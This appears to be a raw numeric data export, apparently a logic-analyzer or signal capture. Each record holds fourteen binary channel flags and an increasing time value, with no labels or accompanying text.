0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1082208e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1082232e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1082260e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1082284e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1082308e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1082332e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1082356e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1082380e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1082408e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1082432e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1082460e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1082484e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1082508e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1082532e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1082556e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1082580e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1082608e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1082632e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1082660e-02 0,0,1,0,0,0,0,0,0,1,0,0,0,0,1.1082684e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,1.1082688e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,0,1.1082732e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,1.1082756e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1082764e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1082780e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1082808e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1082832e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1082860e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1082884e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1082908e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,1.1082912e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,0,1.1082956e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,1.1082980e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1082988e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1083008e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1083032e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1083060e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1083084e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1083132e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1083156e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,1.1083164e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,0,1.1083180e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,1.1083208e-02 0,0,1,0,0,1,0,0,0,0,0,0,0,0,1.1083212e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1083216e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1083232e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,1.1083260e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,0,1.1083308e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,1.1083332e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1083340e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1083356e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1083380e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1083408e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1083432e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1083460e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1083484e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1083532e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1083556e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1083608e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1083632e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1083684e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1083708e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1083756e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1083780e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1083808e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1083832e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1083860e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1083884e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1083908e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1083932e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1083956e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1083980e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1084008e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1084032e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1084060e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1084084e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1084108e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1084132e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1084156e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1084180e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1084208e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1084232e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,1.1084236e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,0,1.1084284e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,1.1084308e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1084316e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1084332e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1084356e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1084408e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1084432e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1084484e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1084508e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1084556e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1084580e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1084608e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1084632e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1084660e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1084684e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1084708e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1084732e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1084756e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1084780e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1084808e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1084832e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,1.1084836e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,0,1.1084884e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,1.1084908e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1084916e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1084932e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1084956e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1084980e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1085008e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1085028e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1085060e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1085084e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1085108e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1085132e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1085156e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1085180e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1085208e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,1.1085212e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,0,1.1085260e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,1.1085284e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1085292e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1085308e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1085332e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1085356e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1085380e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1085408e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1085428e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1085484e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1085508e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1085532e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1085556e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1085608e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1085628e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1085684e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1085708e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1085756e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1085780e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1085804e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1085828e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1085852e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,1.1085884e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,0,1.1085932e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,1.1085956e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1085964e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1085980e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1086004e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1086040e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1086068e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1086092e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1086116e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1086168e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1086192e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1086220e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1086244e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1086268e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1086292e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1086316e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1086340e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1086368e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1086392e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1086420e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1086444e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1086492e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1086516e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,1.1086524e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,0,1.1086540e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,1.1086568e-02 0,0,1,0,0,1,0,0,0,0,0,0,0,0,1.1086572e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1086576e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1086592e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1086620e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1086644e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1086668e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1086716e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1086740e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1086768e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1086792e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1086844e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1086868e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1086916e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1086940e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1086992e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1087012e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1087040e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1087064e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1087092e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1087116e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1087140e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1087164e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1087192e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1087212e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1087240e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1087264e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1087292e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1087316e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1087340e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1087368e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1087392e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1087412e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1087440e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1087468e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1087492e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1087516e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1087540e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1087568e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1087592e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1087612e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1087640e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1087668e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1087692e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1087716e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1087740e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1087768e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1087792e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1087812e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1087840e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1087868e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1087892e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1087916e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,1,1.1212116e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,1,1.1212356e-02 1,0,1,0,0,0,0,0,0,0,0,1,0,1,1.1212372e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,1,1.1212396e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,1,1.1212712e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,1,1.1212736e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,1,1.1212756e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,1,1.1212780e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,1,1.1212836e-02 1,0,1,0,0,0,0,0,0,1,0,0,0,1,1.1212860e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,1,1.1212864e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,1,1.1212908e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,1,1.1212932e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,1,1.1212940e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1212948e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1212980e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1213008e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1213032e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1213060e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1213084e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1213108e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.1213112e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.1213156e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.1213180e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1213188e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1213236e-02 1,0,1,0,0,0,0,0,0,1,0,0,0,0,1.1213260e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.1213264e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.1213284e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.1213308e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.1213332e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.1213356e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.1213380e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.1213408e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1213412e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1213460e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1213484e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1213508e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1213532e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.1213540e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.1213584e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.1213608e-02 1,0,1,0,0,1,0,0,0,0,0,0,0,0,1.1213612e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1213616e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1213632e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1213660e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1213684e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1213708e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1213732e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1213756e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1213780e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1213808e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1213832e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1213860e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1213884e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1213908e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1213932e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1213956e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1213980e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1214008e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1214060e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1214084e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.1214088e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.1214132e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.1214156e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1214164e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1214208e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1214232e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1214260e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1214284e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1214308e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1214332e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1214356e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1214380e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1214412e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1214436e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1214460e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1214484e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1214508e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1214536e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1214560e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1214588e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1214612e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1214636e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1214660e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1214684e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1214708e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1214736e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.1214740e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.1214788e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.1214812e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1214820e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1214836e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1214860e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1214884e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1214908e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1214932e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1214960e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.1214964e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.1215008e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.1215032e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1215040e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1215060e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1215084e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1215132e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1215156e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.1215164e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.1215188e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.1215208e-02 1,0,1,0,0,1,0,0,0,0,0,0,0,0,1.1215216e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1215220e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1215232e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1215260e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1215284e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.1215312e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.1215368e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.1215392e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1215400e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1215420e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1215444e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1215468e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1215492e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1215544e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1215568e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.1215572e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.1215592e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.1215620e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.1215640e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.1215668e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.1215692e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.1215716e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.1215740e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.1215768e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1215772e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1215816e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1215840e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1215868e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1215892e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1215916e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1215940e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1215964e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1215992e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1216016e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1216040e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1216068e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1216092e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1216116e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1216140e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1216164e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1216192e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1216220e-02 1,0,1,0,0,0,0,0,0,1,0,0,0,0,1.1216244e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.1216248e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.1216292e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.1216316e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1216324e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1216368e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1216392e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.1216396e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.1216420e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.1216444e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.1216468e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.1216492e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.1216516e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.1216540e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1216548e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1216596e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1216620e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1216644e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1216668e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1216692e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1216716e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1216740e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1216768e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1216792e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.1216820e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.1216868e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.1216892e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1216900e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1216916e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1216940e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1216968e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1216992e-02 